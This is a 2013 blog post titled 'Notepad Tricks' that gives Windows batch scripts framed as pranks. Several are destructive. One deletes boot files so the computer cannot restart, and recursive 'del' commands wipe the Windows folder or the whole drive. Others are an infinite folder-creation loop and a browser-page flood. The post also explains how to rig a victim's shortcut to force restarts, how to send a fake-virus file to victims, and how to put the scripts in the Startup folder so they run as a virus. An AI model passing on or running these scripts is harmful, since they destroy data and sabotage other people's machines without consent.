Tuesday 23 April 2013

Notepad Tricks

Leave a Comment

Shut Down a Computer Forever (Windows XP):

1. Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

You may try these also:

cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q

2. Save it as a abc.bat file.

Result: This shuts down the persons computer. It shuts it off once and deletes the files needed to reboot and
restart.

Make over 1,000 folders in few seconds:

1. Open notepad and type :

@echo off
:top
md %random%
goto top

2. Save as anything.bat

Result: @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random%is command that creates folders with random names.
goto top – return to label :top, and initiates an infinite loop.

Restarting The Computer:

When you get a chance, Right-click your victim’s icon to Internet Explorer or some other commonly used program. Edit the properties and change the target to: “%windir%\system32\shutdown.exe -r -t 00″ Now, everytime your buddy tries to run IE, his machine will mysteriously restart.

Show Infinite Diretories in Command Prompt:

1. Type this in notepad and save as virus.bat

@echo off
title VIRUS
color 06
echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1


2. Send the saved file to your victim and ask them to run.

The Famous Matrix Effect:

Some-Notepad-Pranks

1. Type this in Notepad:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random%
%random%
goto start


2. Save it as anything.bat

Repeat messages to annoy the user:

1. Type in notepad.

@ECHO off
:Begin
msg * Hi
msg * What are You Doing?
msg * Having Fun!
msg * Lets have it together!
msg * Because you been hacked
GOTO BEGIN


2. Save as anything.bat

Shut Down The Computer after Displaying a Message:
1. Type in notepad.

@echo off
msg * Get Some Rest.
shutdown -c “Errorrrrr . Byeeeeee” -s


2. Save as anything.bat

Just Scare Your Friend, No Harm:

1. Copy the below code in notepad and save as anything.bat
Code:

@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that. Pressing a key made the virus delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A N00B.
pause

Funny fake virus:

Copy this code and paste it in notepad and save it as anyname.bat

@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
echo Deleting Files
pause
:files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&5*((6hkd
echo !&^x755&*G8*%$&
echo !^$$68*$78()&4578
echo !&8898*65$$566$68(9
goto files

Auto shutdown:

Paste this code in notepad and save it as virus.bat

msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
shutdown -t

Create a huge number of folders within minutes:

Paste this code and save it as fun.bat

@echo off
:top
md %random%
goto top

Flood webpage opening of pc:

Copy this code and paste in notepad. Save it as name.bat

:A
start www.freesoftwarerocks.com
goto A

This will flood pages of this blog on your pc.

Delete all the files of a computer:

Copy this code and paste in notepad. Save it as del.bat

del *.*

This will delete all files of hard disk if you run it.

IF YOU PLACE THE .bat FILES YOU MADE HERE IN "STRTUP" FOLDER, IT WILL WORK AS VIRUS AND WILL RUN AUTOMATICALLY WHEN WINDOWS WILL START


ENJOY THESE TRICKS... :-)


0 comments:

Post a Comment

Please don't spam this wonderful page! It'll just look dirty...